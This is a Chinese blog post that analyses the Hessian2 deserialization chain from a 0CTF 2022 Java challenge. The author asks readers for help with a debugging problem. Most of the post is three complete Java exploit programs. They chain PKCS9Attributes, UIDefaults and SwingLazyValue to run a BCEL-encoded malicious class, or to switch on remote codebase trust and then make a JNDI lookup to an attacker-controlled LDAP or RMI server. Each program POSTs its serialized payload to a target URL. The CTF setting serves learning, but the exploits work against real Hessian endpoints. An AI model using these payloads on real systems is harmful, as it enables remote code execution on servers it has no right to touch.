关于hessian2的一些疑点(0CTF来分析)

最新推荐文章于 2023-10-24 16:01:42 发布
最新推荐文章于 2023-10-24 16:01:42 发布
阅读量447 收藏
点赞数
文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/131726022
版权

目录

前言:csdn很久不用了,打算最近拾起来,主要是监督自己。

非常可疑的点

另一种方法通过JNDI注入来

 构造完整的链子

这里,希望佬们解答解答,非常感谢!!!

前言:csdn很久不用了,打算最近拾起来,主要是监督自己。

从SCTF的java题,看到了0CTF的java,发现都是考察hessian2的链子,于是分析了一段时间。

发现本地搭建,就算使用师傅们的EXP都打不通,很郁闷,是jdk的原因嘛??

题目源码下载:https://github.com/waderwu/My-CTF-Challenges/tree/master/0ctf-2022/hessian-onlyJdk

package octf;
import com.caucho.hessian.io.Hessian2Input;
import com.caucho.hessian.io.Hessian2Output;
import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import org.springframework.web.client.RestTemplate;
import sun.reflect.ReflectionFactory;
import sun.security.pkcs.PKCS9Attribute;
import sun.security.pkcs.PKCS9Attributes;
import sun.swing.SwingLazyValue;
import com.caucho.hessian.io.Hessian2Output;
import org.springframework.http.HttpEntity;
import org.springframework.http.ResponseEntity;
import org.springframework.web.client.RestTemplate;
import sun.security.pkcs.PKCS9Attribute;
import sun.security.pkcs.PKCS9Attributes;
import sun.swing.SwingLazyValue;

import javax.swing.*;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.net.Socket;
import java.net.URI;

public class pppoc {
    public static void main(String[] args) throws Exception {
        PKCS9Attributes s = createWithoutConstructor(PKCS9Attributes.class);



        UIDefaults uiDefaults = new UIDefaults();
        JavaClass evil = Repository.lookupClass(linux.class);
        String payload = "$$BCEL$$" + Utility.encode(evil.getBytes(), true);

        uiDefaults.put(PKCS9Attribute.EMAIL_ADDRESS_OID, new SwingLazyValue("com.sun.org.apache.bcel.internal.util.JavaWrapper", "_main", new Object[]{new String[]{payload}}));

        setFieldValue(s,"attributes",uiDefaults);

//        ByteArrayOutputStream baos = new ByteArrayOutputStream();
//        Hessian2Output out = new Hessian2Output(baos);
//        baos.write(67);
//        out.getSerializerFactory().setAllowNonSerializable(true);
//        out.writeObject(s);
//        out.flushBuffer();

//        ByteArrayInputStream bais = new ByteArrayInputStream(baos.toByteArray());
//        Hessian2Input input = new Hessian2Input(bais);
//        input.readObject();

        doPOST(serialize(s));
    }

    public static <T> T createWithoutConstructor(Class<T> classToInstantiate) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
        return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]);
        //实例化的类    实例化的超类   构造函数类型   构造函数值
    }

    public static <T> T createWithConstructor(Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes, Object[] consArgs) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException, InvocationTargetException {
        Constructor<? super T> objCons = constructorClass.getDeclaredConstructor(consArgTypes);
        objCons.setAccessible(true);
        Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);
        sc.setAccessible(true);
        return (T) sc.newInstance(consArgs);
    }
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
    public static byte[] serialize(Object obj) throws IOException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        Hessian2Output out = new Hessian2Output(baos);
        baos.write(67);
        out.getSerializerFactory().setAllowNonSerializable(true);
        out.writeObject(obj);
        out.flushBuffer();
        return baos.toByteArray();
    }
    public static void unserialize(byte[] stream) throws IOException {
        ByteArrayInputStream arrayInputStream=new ByteArrayInputStream(stream);
        Hessian2Input hessian2Input=new Hessian2Input(arrayInputStream);
        hessian2Input.readObject();

    }
    public static void doPOST(byte[] obj) throws Exception{
        URI url = new URI("http://127.0.0.1:8090/");
        HttpEntity<byte[]> requestEntity = new HttpEntity(obj);
        RestTemplate restTemplate = new RestTemplate();
        ResponseEntity<String> res = restTemplate.postForEntity(url, requestEntity, String.class);
        System.out.println(res.getBody());
    }
}
runMain:131, JavaWrapper (com.sun.org.apache.bcel.internal.util)
_main:153, JavaWrapper (com.sun.org.apache.bcel.internal.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
createValue:73, SwingLazyValue (sun.swing)
getFromHashtable:216, UIDefaults (javax.swing)
get:161, UIDefaults (javax.swing)
getAttribute:265, PKCS9Attributes (sun.security.pkcs)
toString:334, PKCS9Attributes (sun.security.pkcs)
valueOf:2994, String (java.lang)
append:131, StringBuilder (java.lang)
expect:2880, Hessian2Input (com.caucho.hessian.io)
readString:1398, Hessian2Input (com.caucho.hessian.io)
readObjectDefinition:2180, Hessian2Input (com.caucho.hessian.io)
readObject:2122, Hessian2Input (com.caucho.hessian.io)

跟着调试的话会更加容易理解一点,上面一层调用一层是做了一个反射构造器的实例化,这里我推测是因为如果直接传入参数会出现类型不匹配,所以用了反射的操作。

非常可疑的点

createValue:73, SwingLazyValue (sun.swing)
getFromHashtable:216, UIDefaults (javax.swing)

就在这两步的调用中,无论如何都调用不到createValue,

 也就是在这里super.get获取的值一直为null,

这里传入的就是key,应该是那个恶意BCEL表达式。 但会一直是null把断点下到了最后命令执行的地方,也跳转不过去,但是如果直接运行还是会弹出计算器的。

另一种方法通过JNDI注入来

package octf.jndi;
import com.caucho.hessian.io.*;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data;
import sun.reflect.ReflectionFactory;
import sun.security.pkcs.PKCS9Attribute;
import sun.security.pkcs.PKCS9Attributes;
import sun.swing.SwingLazyValue;

import java.io.*;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
import java.security.*;
import javax.activation.DataHandler;
import javax.activation.DataSource;
import javax.management.BadAttributeValueExpException;
import javax.swing.*;
import javax.xml.transform.Templates;
import java.lang.reflect.*;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.util.*;
public class sss {
    static final String targetUrl="http://192.168.238.165:8090/";
    public static void main(String[] args) throws Exception {
//        exec("java.lang.System","setProperty",new String[]{"java.rmi.server.useCodebaseOnly","false"});
//        exec("java.lang.System","setProperty",new String[]{"com.sun.jndi.rmi.object.trustURLCodebase","true"});
//        exec("java.lang.System","setProperty",new String[]{"com.sun.jndi.ldap.object.trustURLCodebase","true"});
//        exec("javax.naming.InitialContext","doLookup",new String[]{"rmi://xxxx:1099/4metkg"});
        SwingLazyValue value= new SwingLazyValue("javax.naming.InitialContext", "doLookup", new Object[]{"ldap://127.0.0.1:1389/ilsogp"});
       // SwingLazyValue value= new SwingLazyValue("javax.naming.InitialContext", "doLookup", new Object[]{"rmi://127.0.0.1:1099/ilsogp"});
        UIDefaults uiDefaults = new UIDefaults();
        uiDefaults.put(PKCS9Attribute.CHALLENGE_PASSWORD_OID,value);
        Object o=obj("sun.security.pkcs.PKCS9Attributes");
        setValue(o,"attributes",uiDefaults);
        o.toString();
       // SwingLazyValue
//javax.naming.InitialContext.doLookup()


    }

    public static void exec(String className,String methodName,Object[] args) throws Exception{
        SwingLazyValue value= new SwingLazyValue(className, methodName, args);
        UIDefaults uiDefaults = new UIDefaults();
        uiDefaults.put(PKCS9Attribute.CHALLENGE_PASSWORD_OID,value);
        Object o=obj("sun.security.pkcs.PKCS9Attributes");
        setValue(o,"attributes",uiDefaults);

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        Hessian2Output hessianOutput1=new Hessian2Output(byteArrayOutputStream);
        hessianOutput1.getSerializerFactory().setAllowNonSerializable(true);
        hessianOutput1.writeString("aaa");
        hessianOutput1.writeObject(o);
        hessianOutput1.flushBuffer();
        byte[] b=byteArrayOutputStream.toByteArray();

        post(b);
    }
    public static void post(byte[] b) throws Exception{
        URL url=new URL(targetUrl);
        HttpURLConnection con = (HttpURLConnection) url.openConnection();
        con.setRequestMethod("POST");
        con.setDoOutput(true);
        try(OutputStream os = con.getOutputStream()) {
            os.write(b);
        }


        BufferedReader in = new BufferedReader(
                new InputStreamReader(con.getInputStream()));
        String inputLine;
        StringBuffer content = new StringBuffer();
        while ((inputLine = in.readLine()) != null) {
            content.append(inputLine);
        }
        in.close();

        System.out.println(content.toString());
    }

    public static Object obj(String s) throws ClassNotFoundException, InvocationTargetException, NoSuchMethodException, InstantiationException, IllegalAccessException {
        return createWithoutConstructor(Class.forName(s));
    }
    public static <T> T createWithoutConstructor ( Class<T> classToInstantiate )
            throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
        return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]);
    }
    public static <T> T createWithConstructor ( Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes, Object[] consArgs )
            throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
        Constructor<? super T> objCons = constructorClass.getDeclaredConstructor(consArgTypes);
        setAccessible(objCons);
        Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);
        setAccessible(sc);
        return (T)sc.newInstance(consArgs);
    }
    public static void setAccessible(AccessibleObject member) {
        String versionStr = System.getProperty("java.version");
        int javaVersion = Integer.parseInt(versionStr.split("\\.")[0]);
        if (javaVersion < 12) {
            // quiet runtime warnings from JDK9+
//            Permit.setAccessible(member);
        } else {
            // not possible to quiet runtime warnings anymore...
            // see https://bugs.openjdk.java.net/browse/JDK-8210522
            // to understand impact on Permit (i.e. it does not work
            // anymore with Java >= 12)
            member.setAccessible(true);
        }
    }
    public static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

其实可以简单的看出来这俩种方法的区别就是在于,最后swingLazyValue#createvalue方法中的invoke方法,一个是利用BCEL触发命令执行,一个是用的dolookup触发的命令执行,然后简单的解释一下里面代码的作用。

 这个put就是这个,但始终为null,所以key就是我们传入的键名,

SwingLazyValue value= new SwingLazyValue("javax.naming.InitialContext", "doLookup", new Object[]{"ldap://127.0.0.1:1389/ilsogp"});

 

上面的初始化通过invoke很好写,这里不加描述, 最后命令执行点是这里的doLookup会调用lookup。

SwingLazyValue value= new SwingLazyValue("javax.naming.InitialContext", "doLookup", new Object[]{"ldap://127.0.0.1:1389/ilsogp"});

这里的1389是我本地开启的

 构造完整的链子

package octf.jndi;

import com.caucho.hessian.io.*;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data;
import sun.reflect.ReflectionFactory;
import sun.security.pkcs.PKCS9Attribute;
import sun.security.pkcs.PKCS9Attributes;
import sun.swing.SwingLazyValue;

import java.io.*;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
import java.security.*;
import javax.activation.DataHandler;
import javax.activation.DataSource;
import javax.management.BadAttributeValueExpException;
import javax.swing.*;
import javax.xml.transform.Templates;
import java.lang.reflect.*;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.util.*;
public class Solve {
    static final String targetUrl="http://192.168.238.165:8090/";
    public static void main(String[] args) throws Exception {
        exec("java.lang.System","setProperty",new String[]{"java.rmi.server.useCodebaseOnly","false"});
        exec("java.lang.System","setProperty",new String[]{"com.sun.jndi.rmi.object.trustURLCodebase","true"});
        exec("java.lang.System","setProperty",new String[]{"com.sun.jndi.ldap.object.trustURLCodebase","true"});
        exec("javax.naming.InitialContext","doLookup",new String[]{"rmi://xxxx:1099/4metkg"});
    }

    public static void exec(String className,String methodName,Object[] args) throws Exception{
        SwingLazyValue value= new SwingLazyValue(className, methodName, args);
        UIDefaults uiDefaults = new UIDefaults();
        uiDefaults.put(PKCS9Attribute.CHALLENGE_PASSWORD_OID,value);
        Object o=obj("sun.security.pkcs.PKCS9Attributes");
        setValue(o,"attributes",uiDefaults);

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        Hessian2Output hessianOutput1=new Hessian2Output(byteArrayOutputStream);
        hessianOutput1.getSerializerFactory().setAllowNonSerializable(true);
        hessianOutput1.writeString("aaa");
        hessianOutput1.writeObject(o);
        hessianOutput1.flushBuffer();
        byte[] b=byteArrayOutputStream.toByteArray();

        post(b);
    }
    public static void post(byte[] b) throws Exception{
        URL url=new URL(targetUrl);
        HttpURLConnection con = (HttpURLConnection) url.openConnection();
        con.setRequestMethod("POST");
        con.setDoOutput(true);
        try(OutputStream os = con.getOutputStream()) {
            os.write(b);
        }


        BufferedReader in = new BufferedReader(
                new InputStreamReader(con.getInputStream()));
        String inputLine;
        StringBuffer content = new StringBuffer();
        while ((inputLine = in.readLine()) != null) {
            content.append(inputLine);
        }
        in.close();

        System.out.println(content.toString());
    }

    public static Object obj(String s) throws ClassNotFoundException, InvocationTargetException, NoSuchMethodException, InstantiationException, IllegalAccessException {
        return createWithoutConstructor(Class.forName(s));
    }
    public static <T> T createWithoutConstructor ( Class<T> classToInstantiate )
            throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
        return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]);
    }
    public static <T> T createWithConstructor ( Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes, Object[] consArgs )
            throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
        Constructor<? super T> objCons = constructorClass.getDeclaredConstructor(consArgTypes);
        setAccessible(objCons);
        Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);
        setAccessible(sc);
        return (T)sc.newInstance(consArgs);
    }
    public static void setAccessible(AccessibleObject member) {
        String versionStr = System.getProperty("java.version");
        int javaVersion = Integer.parseInt(versionStr.split("\\.")[0]);
        if (javaVersion < 12) {
            // quiet runtime warnings from JDK9+
//            Permit.setAccessible(member);
        } else {
            // not possible to quiet runtime warnings anymore...
            // see https://bugs.openjdk.java.net/browse/JDK-8210522
            // to understand impact on Permit (i.e. it does not work
            // anymore with Java >= 12)
            member.setAccessible(true);
        }
    }
    public static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

直接照搬了,和上面那个没区别,就是在setAccess考虑了版本, 

代码的作用是根据当前Java版本来设置成员的访问权限。首先,它通过System.getProperty("java.version")获取当前Java版本的字符串表示。然后,它将版本字符串按照.进行分割,并取得第一个部分作为整数类型的Java版本号。

接下来,代码使用条件语句判断Java版本号是否小于12。如果小于12,则注释掉了一行代码Permit.setAccessible(member),这是为了抑制JDK9+版本中的运行时警告。这里的Permit可能是一个自定义的类或库,用于设置访问权限。

如果Java版本大于等于12,则执行member.setAccessible(true),将成员的访问权限设置为可访问。

需要注意的是,注释中提到从Java 12开始,无法再抑制运行时警告,因为在Java 12及以上版本中,Permit可能不再起作用。这是由于Java开发团队在JDK-8210522中修复了一个问题,导致无法继续使用Permit来设置访问权限。

总之,这段代码根据Java版本来设置成员的访问权限,并考虑了不同版本之间的差异和限制。

因为题目是高jdk,

  1. JDK 5U45、6U45、7u21、8u121 开始 java.rmi.server.useCodebaseOnly 默认配置为true
  2. JDK 6u132、7u122、8u113 开始 com.sun.jndi.rmi.object.trustURLCodebase 默认值为false
  3. JDK 11.0.1、8u191、7u201、6u211 com.sun.jndi.ldap.object.trustURLCodebase 默认为false

所以需要修改,但是把题目搭建在本地,进行调试还是卡在了

createValue:73, SwingLazyValue (sun.swing)
getFromHashtable:216, UIDefaults (javax.swing)

这里,希望佬们解答解答,非常感谢!!!

 

偶尔躲躲乌云334
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fastjson反序列化 BasicDataSource链分析
Vicl1fe的博客
01-06 833
前言 BCEL BCEL的全名是Apache Commons BCEL,属于Apache Commons项目下的一个子项目,CC链也就是从Apache Commons产生的。 BCEL库提供了一系列用于分析、创建、修改Java Class文件的API。主要用来将xml文档转为class文件。编译后的class被称为translet,可以在后续用于对XML文件的转换。该库已经内置在了JDK中。关于BCEL具体详情可参考https://www.leavesongs.com/PENETRATION/where-i
探讨Hessian在PHP中的使用分析
01-21
什么是Hessian Hessian是由caucho提供的一种开源的远程通讯协议。 采用二进制 RPC 协议,基于 HTTP 传输,服务器端不用另开放防火墙端口。 协议的规范是公开的,可以用于任意语言。 采用客户机/服务器模式。 ...
[Java安全]Spring SPEL注入总结&回显技术
最新发布
2301_80115097的博客
10-24 915
在SpEL表达式中,变量定义通过EvaluationContext类的setVariable(variableName, value)函数来实现;在表达式中使用”#variableName”来引用;#this:使用当前正在计算的上下文;#root:引用容器的root对象;@something:引用Bean。
Javaweb安全——Dubbo 反序列化(一)
weixin_43610673的博客
02-13 1381
Apache Dubbo 是一款 RPC 服务开发框架。智能容错和负载均衡,以及服务自动注册和发现。
java hessian 协议_hessian 协议 版本 兼容
weixin_33362555的博客
02-24 461
环境 :服务端: hessian 4.0.38 , spring 4.3.6 ; spring文档指出spring4.0以上的版本只能使用hessian 4.0以上的版本客户端: hessian3.1.5异常 :服务端没有异常 ,客户端请求服务端抛出以下异常,无法获取请求结果。Caused by : com.caucho.hessian.io.HessianProtocolException: ...
Java 序列化之Hessian2完全解读
键盘上流淌的日子
10-10 5346
欢迎大家关注本博,同时欢迎大家评论交流,可以给个赞哦!!!   Serializable 劣势   实现Serializable接口,可以通过Java的序列化机制自动完成JavaBean的序列化和反序列化过程,亦可以通过ObjectOutputStream.writeObject()和ObjectInputStream.readObject自定义部分序列化过程,但是主要序列化过程还是需要ObjectOutputStream.defaultWiteObject()和ObjectInputStream.de.
Hessian源码分析和Hack.doc
09-14
Hessian源码分析与Hack:携带远程调用端信息》 Hessian作为一种轻量级的RPC(远程过程调用)框架,因其高效、简洁的二进制协议,被广泛应用于构建Web服务。然而,在实际应用中,有时我们需要获取到远程调用端的IP...
dubbo-hessian-lite:适用于Apache Dubbo的Hessian Lite
05-27
Hessian Lite(Apache Dubbo专用版) Hessian-lite最初是的Apache dubbo嵌入版本。 然后,此模块与Dubbo分离。 所有分支:2.5.x,2.6.x(自2.6.3起)和2.7.x都依赖于它,请查看详细信息: 现在,我们正在尝试建立一...
hessian-lite-3.2.1-fixed-2.jar
01-18
com.alibaba:hessian-lite:jar:3.2.1-fixed-2 hessian-lite hessian-lite-3.2.1-fixed-2.jar
dubbo 报错 com.alibaba.com.caucho.hessian.io.Hessian2Output.writeObject(Hessian2Output.java:408)
海印
07-29 4429
cause: java.lang.StackOverflowError java.lang.StackOverflowError at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:497)
hessian异常
gaoshanliushui2009的专栏
10-20 6458
源自:http://fancyboy2050.iteye.com/blog/716967 试了下hessian的远程调用,网上例子很多,随便down了几个下来测试,结果都有异常:  Java代码   2010-7-20 13:42:34 com.caucho.hessian.io.SerializerFactory getDeserializer   警告: Hes
hessian 问题与解决 是否很快捷
yang576017120的专栏
05-30 443
前几天用hessian发布接口的时候,老是报类似与下面的这种错误 Exception in thread "main" com.caucho.hessian.client.HessianRuntimeException: com.caucho.hessian.io.HessianProtocolException: '6' is an unknown class definition at c...
Hessian官方用户文档
three_man的专栏
10-16 3527
翻译 Hessian使用文档
hession调用json解析异常 com.caucho.hessian.io.HessianProtocolException: expected integer at 0x74 java.util
烤鸭的世界我们不懂的博客
03-31 3489
大家好,我是烤鸭: 采坑实录,使用hession报错 expected integer at 0x74 java.util.ArrayList。 1. 报错信息如下: 2020-03-18 14:27:48.057 [TID: N/A] [Apollo-RemoteConfigLongPollService-1] WARN [class:com.ctrip.framework.ap...
com.caucho.hessian.io.HessianProtocolException: expected string at 0x6d
一个专注于电子商务的人的唧唧歪歪
03-08 1万+
 最近在做一个Spring结合Hessian的远程调用,总是出现上述异常,究其原因是Hessian远程不支持方法重载,当是本地支持的,方法重命名可以解决问题。
解决hessian com.caucho.hessian.io.hessianprotocolexception 异常
热门推荐
morris
09-01 2万+
现象项目中使用到hessian,调用到hessian服务端的含有重载方法的接口出现了如下错误: com.caucho.hessian.io.HessianProtocolException: is unknown code expected end of call (‘z’) at 0x4d (M). Check method arguments and ensure method o
Sun公司网站上的Swing实例,想学Swing的不看后悔
fdyufgf的博客
11-16 181
Sun公司网站上的Swing实例,想学Swing的不看后悔
【解决】spring中集成hessian报异常,ClassNotFoundException:com.caucho.hessian.io.HessianDebugOutputStream
fangzhangsc2006的专栏
09-13 8443
环境: spring 2.5.2 hessian 3.0.20 在启动服务器时,报出异常。 java.lang.classNotFoundException:com.caucho.hessian.io.HessianDebugOutputStream 字面意思为没有找到HessianDebugOutputStream类,打开hessian的jar包后果然没有找到这个类。 原因:

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值